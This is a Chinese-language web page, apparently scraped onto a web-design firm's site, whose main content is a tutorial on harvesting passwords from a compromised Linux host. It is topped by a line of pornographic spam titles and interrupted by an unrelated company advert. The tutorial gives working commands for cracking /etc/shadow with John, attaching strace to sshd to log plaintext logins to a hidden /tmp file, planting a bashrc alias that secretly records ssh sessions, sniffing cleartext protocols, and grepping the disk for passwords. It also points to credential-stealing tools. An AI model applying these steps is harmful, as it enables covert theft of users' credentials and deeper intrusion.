日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷解決方案
Linux下密碼憑證竊取技巧和工具

當(dāng)獲得一臺(tái)主機(jī)的root權(quán)限,我們總是會(huì)想辦法通過收集各種密碼憑證,以便繼續(xù)擴(kuò)大戰(zhàn)果。Linux下的環(huán)境,相對(duì)比更純粹一些,介紹幾個(gè)比較常見的技巧和工具。

成都創(chuàng)新互聯(lián)專注于網(wǎng)站建設(shè)|成都網(wǎng)站改版|優(yōu)化|托管以及網(wǎng)絡(luò)推廣,積累了大量的網(wǎng)站設(shè)計(jì)與制作經(jīng)驗(yàn),為許多企業(yè)提供了網(wǎng)站定制設(shè)計(jì)服務(wù),案例作品覆蓋成都濕噴機(jī)等行業(yè)。能根據(jù)企業(yè)所處的行業(yè)與銷售的產(chǎn)品,結(jié)合品牌形象的塑造,量身開發(fā)品質(zhì)網(wǎng)站。

01、history記錄敏感操作

Linux系統(tǒng)會(huì)自動(dòng)把用戶的操作命令記錄到歷史列表中,當(dāng)用戶在命令行中輸入賬號(hào)、密碼進(jìn)行登錄時(shí),將會(huì)導(dǎo)致敏感信息泄露。

Linux下密碼憑證竊取技巧和工具介紹Linux下密碼憑證竊取技巧和工具介紹

02、shadow文件破解

shadow用于存儲(chǔ) Linux 系統(tǒng)中用戶的密碼信息,以一個(gè)用例來說明:

root:$1$aXmGMjXX$MGrR.Hquwr7UVMwOGOzJV0::0:99999:7:::

密碼域密文由三部分組成,即:encrypted。當(dāng)id=1,采用md5進(jìn)行加密,弱口令容易被破解。

當(dāng)id為5時(shí),采用SHA256進(jìn)行加密,id為6時(shí),采用SHA512進(jìn)行加密,可以通過john進(jìn)行暴力破解。

wget https://www.openwall.com/john/k/john-1.9.0.tar.gz
tar -zxvf john-1.9.0.tar.gz
make clean linux-x86-64
./john /etc/shadow

03、mimipenguin抓取密碼

一款Linux下的密碼抓取神器,需要root權(quán)限運(yùn)行,通過轉(zhuǎn)儲(chǔ)進(jìn)程并提取很可能包含明文密碼的行來利用內(nèi)存中的明文憑證,目前支持Kali、Ubnutu等操作系統(tǒng)。

Github地址:https://github.com/huntergregal/mimipenguin

04、使用Strace收集登錄憑證

strace是一個(gè)動(dòng)態(tài)跟蹤工具,堪比鍵盤記錄器的存在,可用來收集登錄憑證。

(1)獲取sshd進(jìn)程明文密碼

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)

使用正在來匹配用戶和密碼

# 查找用戶名和密碼
grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log

# 結(jié)果形式如下
[pid  2401] 22:34:34 read(6, "\10\0\0\0\4root", 9) = 9
[pid  2401] 22:34:34 read(6, "\4\0\0\0\16ssh-connection\0\0\0\0\0\0\0\0", 27) = 27
[pid  2401] 22:34:34 read(6, "\f\0\0\0\4toor", 9) = 9

(2)收集ssh登陸憑證

# 添加命令別名
vi ~/.bashrc或者/etc/bashrc
alias ssh='strace -f -e trace=read,write -o /tmp/.ssh-`date '+%d%h%m%s'`.log -s 32 ssh'
# 使命令別名立即生效
source ~/.bashrc

通過grep 找到匹配行的后8行,可以根據(jù)密碼長(zhǎng)度調(diào)整行數(shù)

grep -A 9 'password' .ssh-25Sep091601017212.log

05、tcpdump 抓包分析

抓取數(shù)據(jù)包進(jìn)行分析,獲取明文賬號(hào)密碼,比如ftp、telnet、http。

tcpdump -i ens33 port 23 -w test.cap

06、全盤搜索敏感信息

全局搜索配置文件、腳本、數(shù)據(jù)庫、日志文件是否有包含密碼。

grep -rn "password=" /

07、swap_digger

一個(gè)用于自動(dòng)進(jìn)行Linux交換分析bash腳本,自動(dòng)進(jìn)行交換提取,并搜索Linux用戶憑據(jù),Web表單憑據(jù),Web表單電子郵件,HTTP基本身份驗(yàn)證,WiFi SSID和密鑰等。

github項(xiàng)目地址:https://github.com/sevagas/swap_digger

08、Impost3r

一個(gè)利用C語言編寫,用來竊取linux下各類密碼(ssh,su,sudo)的工具。

github項(xiàng)目地址:https://github.com/ph4ntonn/Impost3r


本文標(biāo)題:Linux下密碼憑證竊取技巧和工具
本文來源:http://www.5511xx.com/article/dpdeiio.html